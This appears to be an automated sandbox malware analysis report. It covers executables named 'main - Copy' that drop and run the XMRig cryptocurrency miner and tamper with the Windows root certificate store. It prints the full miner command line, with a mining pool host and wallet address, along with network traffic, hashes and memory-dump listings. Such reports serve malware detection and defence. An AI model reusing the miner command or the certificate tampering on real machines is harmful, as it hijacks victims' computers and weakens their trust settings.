01a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
NL 23.62.61.112:443 www.bing.com tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 112.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 52.111.227.14:443 tcp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/5052-16-0x000002A408590000-0x000002A4085B0000-memory.dmp

memory/5052-17-0x000002A4085E0000-0x000002A408600000-memory.dmp

memory/5052-18-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-19-0x000002A409DC0000-0x000002A409DE0000-memory.dmp

memory/5052-21-0x000002A409DE0000-0x000002A409E00000-memory.dmp

memory/5052-20-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-22-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-24-0x000002A409DC0000-0x000002A409DE0000-memory.dmp

memory/5052-23-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-25-0x000002A409DE0000-0x000002A409E00000-memory.dmp

memory/5052-26-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-27-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-28-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-29-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-30-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-31-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-32-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-33-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-34-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-35-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-36-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-37-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-38-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-39-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-40-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-41-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-42-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-43-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-44-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-45-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-46-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-47-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-48-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-49-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-50-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-51-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-52-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-53-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-54-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-55-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-56-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-57-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-58-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-59-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-60-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-61-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-62-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-63-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-64-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-65-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-66-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-67-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-68-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-69-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-70-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-71-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-72-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-73-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-74-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-75-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-76-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-77-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-78-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-79-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-80-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-81-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-82-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-83-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

memory/5052-84-0x00007FF77DB80000-0x00007FF77E683000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 21:56

Platform

win10v2004-20240426-en

Max time kernel

1792s

Max time network

1790s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 98.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 52.111.227.11:443 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 106.246.116.51.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4736-16-0x00000118981F0000-0x0000011898210000-memory.dmp

memory/4736-17-0x0000011898240000-0x0000011898260000-memory.dmp

memory/4736-18-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-21-0x0000011898260000-0x0000011898280000-memory.dmp

memory/4736-20-0x0000011898280000-0x00000118982A0000-memory.dmp

memory/4736-19-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-22-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-23-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-25-0x0000011898260000-0x0000011898280000-memory.dmp

memory/4736-24-0x0000011898280000-0x00000118982A0000-memory.dmp

memory/4736-26-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-27-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-28-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-29-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-30-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-31-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-32-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-33-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-34-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-35-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-36-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-37-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-38-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-39-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-40-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-41-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-42-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-43-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-44-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-45-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-46-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-47-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-48-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-49-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-50-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-51-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-52-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-53-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-54-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-55-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-56-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-57-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-58-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-59-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-60-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-61-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-62-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-63-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-64-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-65-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-66-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-67-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-68-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-69-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-70-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-71-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-72-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-73-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-74-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-75-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-76-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-77-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-78-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-79-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-80-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-81-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-82-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-83-0x00007FF600730000-0x00007FF601233000-memory.dmp

memory/4736-84-0x00007FF600730000-0x00007FF601233000-memory.dmp